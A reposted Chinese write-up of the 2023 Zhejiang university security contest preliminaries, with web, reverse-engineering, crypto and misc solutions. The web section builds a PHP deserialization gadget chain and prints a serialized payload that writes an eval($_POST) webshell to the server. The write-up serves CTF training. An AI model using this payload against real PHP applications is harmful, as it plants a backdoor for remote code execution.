2023浙江省大学生信息安全竞赛初赛部分wp

7月前作者：丨Arcueid丨分类：Toy博客阅读(36) 违法举报

这篇具有很好参考价值的文章主要介绍了2023浙江省大学生信息安全竞赛初赛部分wp。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

Web

easy php

BBB::__debuginfo() -> CCC::__toString() -> AAA::__call()

<?php
class AAA{
    public $cmd;

    public function __call($name, $arguments){
        eval($this->cmd);
        return "done";
    }
}

class BBB{
    public $param1;
    public function __construct($param1){
        $this->param1 = $param1;
    }
    public function __debuginfo(){
        return [
            'debugInfo' => 'param1' . $this->param1 
        ];
    }
}

class CCC{
    public $func;

    public function __toString(){
        var_dump("aaa");
        $this->func->aaa();
    }
}

if(isset($_GET['aaa'])){
    $aaa = $_GET['aaa'];
    var_dump(unserialize($aaa));
}


$C = new CCC();
$B = new BBB($C);
$A = new AAA();
$A ->cmd= "file_put_contents('shell.php','<?php eval(\$_POST[1]);?>');";
$C->func = $A; 

echo serialize($B);
# O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";O:3:"AAA":1:{s:3:"cmd";s:58:"file_put_contents('shell.php','<?php eval($_POST[1]);?>');";}}}

RE

pyccc

uncompyle6.exe 逆不出py

逆出如下文件 2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

分析可知先初始化一个数组再对其内的每个元素异或其下标

c=[102,109,99,100,127,52,114,88,97,122,85,125,105,127,119,80,120,112,98,39,109,52,55,106]
# print(len(c))
tem = ""
for i in range(len(c)):
    tem += chr((c[i]) ^ i)
print(tem,end="")

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

flag{1t_is_very_hap4y!!}

ezapk

反编译apk

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

解aes

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

Crypto

小小数学家

re 匹配数字和符号进行运算

import re
num = re.compile("\d+")
symble = re.compile("\W")

with open("./flag.txt", "r")as f:
    lines = f.readlines()

    for line in lines:
        nums = (num.findall(line))
        symbles = (symble.findall(line))
        print(chr(int(eval(nums[0]+ symbles[0] + nums[1]))),end="")

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

DASCTF{9d811301-281b-4f4a-8d1a-b38beccf2285}

基础数论

sage解p² + q² =n

import hashlib

c = 173178061442550241596295506150572803829268102881297542445649200353047297914764783385643705889370567071577408829104128703765633248277722687055281420899564198724968491216409225857070531370724352556864154450614891750313803499101686782558259953244119778256806332589612663957000269869144555485216828399422391672121
x,y = (two_squares(c))
print(x,y)
print(hashlib.md5(str(x+y).encode()).hexdigest())

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

8ef20a4873c5ec776dd34bf5f0eb56cf

MISC

number game

后端就只有个js文件，可以发现roll这段代码很关键（因为题目说通过roll得到flag）

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

将这段js复制处理，放入console，把if的判断条件改为true，然后再次点击roll，可以发现弹
flag了

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

Ez_misc

拿到题目，根据jpg的文件头，可以发现每两位16进制是反的，那么我们只需要翻转就行了

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

使用脚本进行反转

'''
A.bin
21.7.22
'''
input=open('C:/Users/Abin/Desktop/yuanshen','rb')
input_all = input.read()
ss =input_all[::-1]
output=open('C:/Users/Abin/Desktop/y.zip','wb')
output.write(ss)
input.close()
output.close()

反转之后的结果并不是正确的（因为是逆序的十六进制），我们还需要将整体的字符串反
转，这里我使用工具进行反转

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

数据放入010中生成图片

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

使用steghide进行解密，获得flag.txt

DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT
DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT
DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH
DASHDASHDOTDOTDOT DASHDOTDOT

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

根据摩斯密码的特征，及那个DASH转为-，DOT转为.，获得下面的代码

-… -… -… -.-. -… .---- -… --… --… -… -… …- -… -… …-- …- -… -… …-- -… …-- …-- …–
… -… .---- -… …— …-- …-- …-- …- …-- …— -… .---- …-- … -… …— …-- …-- -… …— -…
…— …-- —… …-- … …-- … -… .---- …-- …- …-- -… …-- …- -… …- …-- --… -… …— -…
…— …-- …- -… … -… …-- --… -…

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

解得flag
flag{df4f635ab342a5b3bb855a464d7bb4ec}文章来源地址https://www.toymoban.com/news/detail-743235.html

到了这里，关于2023浙江省大学生信息安全竞赛初赛部分wp的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

2021-2023浙江省内八大MBA项目招生情况:注意大小年啊～

nbsp; nbsp; nbsp; nbsp;现如今国内的MBA教育呈现出一片繁华景象，过去的这些年来每年几乎都有新增加的MBA招生院校，浙江省内目前共有九大MBA招生院校，除了浙大独领风骚之外，其余八个MBA项目也都有自己的一席之地。纵观2023年的招生录取，小立老师认为很明显的是属于大年行

2024年02月08日
浏览(40)
2023年2月浙江省中小企业协会与各专委会大事记

1 1月13日上午，协会领导蔡章生带队走访国家绿色技术交易中心，调研绿色技术创新工作，与国家绿色技术交易中心副主任贺沛宇、中教能源研究院黄刚院长（线上视频参会）、项目主管郦剑飞等进行座谈，研究推进“双碳”产业、EATNS碳管理体系建设以及节能降耗项目落户浙

2024年02月14日
浏览(30)
Mapbox加载浙江省天地图服务和数据处理

通过浙江省天地图官网申请所需服务，使用token获取服务数据由于浙江省天地图使用的坐标系是 cgcs2000，需要使用的框架对应为 @cgcs2000/mapbox-gl，通过cdn引入或npm下载影像服务地址为： ‘https://ditu.zjzwfw.gov.cn:443/services/wmts/imgmap/default/oss?service=WMTSrequest=GetTileversion=1.0.0layer=im

2024年01月23日
浏览(32)
2022浙江省计算机三级网络及安全技术考试自学资料（2）（更新于3.8）

目录 4-网络信息安全概况 4-1信息安全基础 4-1-1信息安全基本属性 4-1-2信息安全基本模型 4-1-3信息安全基本法规 4-2密码应用基础 4-2-1古典密码 4-2-2现代密码 4-2-4加密模式 4-2-5分组密码 4-2-6流加密 4-2-7公钥密码 4-2-8哈希函数 4-2-9数字信封 4-1-1信息安全基本属性保密性Confidenti

2024年02月01日
浏览(38)
浙江省计算机三级网络及安全技术资料(最后有我考完后的想法）

还有一周就要考试了，网上几乎找不到浙江省的计算机三级网络及安全技术的复习资料，大部分都是全国计算机三级的复习资料，气得我直接对着大纲一部分一部分找过去。以后的友友们需要的自取，为了能够顺利通过浙江省计算机三级考试，我给大家铺好路。三

2024年02月08日
浏览(33)
2023陕西省大学生信息安全竞赛web writeup

早写好了，忘发了，题目质量还行，够我坐大牢简单的反序列化，exp如下传参这有个坑，用了Unicode编码，得copy下来进行url编码才能传参，不知道这么干有什么意义，还得绕过Exception,把变量数改一下就能绕过了，跟绕wakeup一样 preg_replace采用了/e的模式，很明显有rce漏洞，简

2024年02月07日
浏览(31)
大学生简历信息填写模板

大学生简历信息填写模板篇1 姓名：__性别：_年龄：22健康状况：良好籍贯：__家庭背景：职工家庭所学专业：市场营销学历：本科(在读) 参业意向：可从事文秘工作、贸易、产品营销、活动策划、谈判沟通、广告宣传，市场调查等方面工作。知识结构：

2024年02月09日
浏览(32)
2023大学生申请github学生认证经验分享

如图，笔者最近刚刚申请完github的学生认证，于是想着来分享经验让大家能轻松通过认证。你需要有以下材料：教育邮箱（大学一般都会有教育邮箱，学校官网找找邮箱页面，申请个邮箱）学信网教育部学籍在线验证报告都有的话你就只需要跟着下面的步骤。首先你得

2024年02月09日
浏览(46)
基于java大学生兼职信息管理系统

目前的兼职中介不仅损害了大学生的经济利益，让他们对网上兼职避而远之，与此同时，很多客户比如家里有小孩子的家长都想找一个安全、可靠的家教帮助孩子提高成绩，通过中介找到的既不安全可靠，价格也相对昂贵。因此，为大学生与客户之间搭建一个能直接联系的沟

2023年04月08日
浏览(37)
2023“钉耙编程”中国大学生算法设计超级联赛（5）

给你台风的轨迹坐标以及避难所的坐标，台风的半径不可预测，求让每个避难所不安全的最小台风半径是多少。枚举每个点到所有“线段”的距离取个min。附上队友的代码（懒）: 给定一个长度为n的字符串，编号1-n，求满足条件的区间（i, j）的数量： ①1 ≤ i ＜ j ≤ n ②

2024年02月09日
浏览(35)